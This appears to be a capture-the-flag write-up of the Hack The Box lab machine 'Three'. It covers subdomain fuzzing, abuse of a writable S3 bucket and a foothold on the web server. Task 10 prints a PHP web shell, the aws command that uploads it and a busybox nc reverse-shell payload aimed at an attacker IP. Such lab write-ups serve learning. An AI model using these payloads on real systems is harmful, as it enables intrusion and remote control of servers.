sec👨‍💻fortress:~#

Defensive By Offensive!.

View on GitHub

Starting Point HackTheBox

Machine name: Three

image

Task 1

First Let’s scan the target image

Answer: 2 

Task 2

Going over to the web page shows this image

Checking the Contact page shows this email address image

We can see the domain name

Answer:  thetoppers.htb 

Task 3

For this we need to edit our /etc/hosts file so that it can resolve the hostname to ip address image

Answer: /etc/hosts

Task 4

Let us fuzz for subdomain using ffuf image

We see that the result shows that the s3 sub domain is up

So i’ll add s3.thetoppers.htb to my /etc/hosts file image

Answer: s3.thetoppers.htb

Task 5

Since we see the sub domain name looks interesting i’ll search it up on google image

From the result we can tell the answer is Amazon S3

Answer: Amazon S3

Task 6

Searching google for this gives the answer image

Answer: awscli

Task 7

I installed aws tool from here

So to set up aws we use aws configure

Answer: aws configure

Task 8

To list all of the S3 bucket we use:

Answer: aws s3 ls 

But doing that on the target shows this image

It is trying to access the main amazon aws endpoint

But we just need to reference it to the endpoint already give to us

So I did this image

Cool we see the index.php & .htaccess file

Task 9

Back to the web app image

Using wappalyzer shows the language of the web server image

Answer: PHP

Task 10

Since we know the aws allows write access we can put files to the aws

But let us first download the index.php file image

Opening it shows it is the web root directory of the web server on port 80 image

Cool. So this means we can upload our own file to the server

I created a file with this content names shell.php image

<?php system($_GET['cmd']); ?>

Now i uploaded it to the aws image

aws s3 --endpoint http://s3.thetoppers.htb cp shell.php s3://thetoppers.htb/

Our shell is uploaded we can now access it from the web server image

We are user www-data let’s get a reverse shell image

Payload: http://thetoppers.htb/shell.php?cmd=busybox%20nc%2010.10.14.27%201337%20-e%20/bin/bash

The flag is there :) image image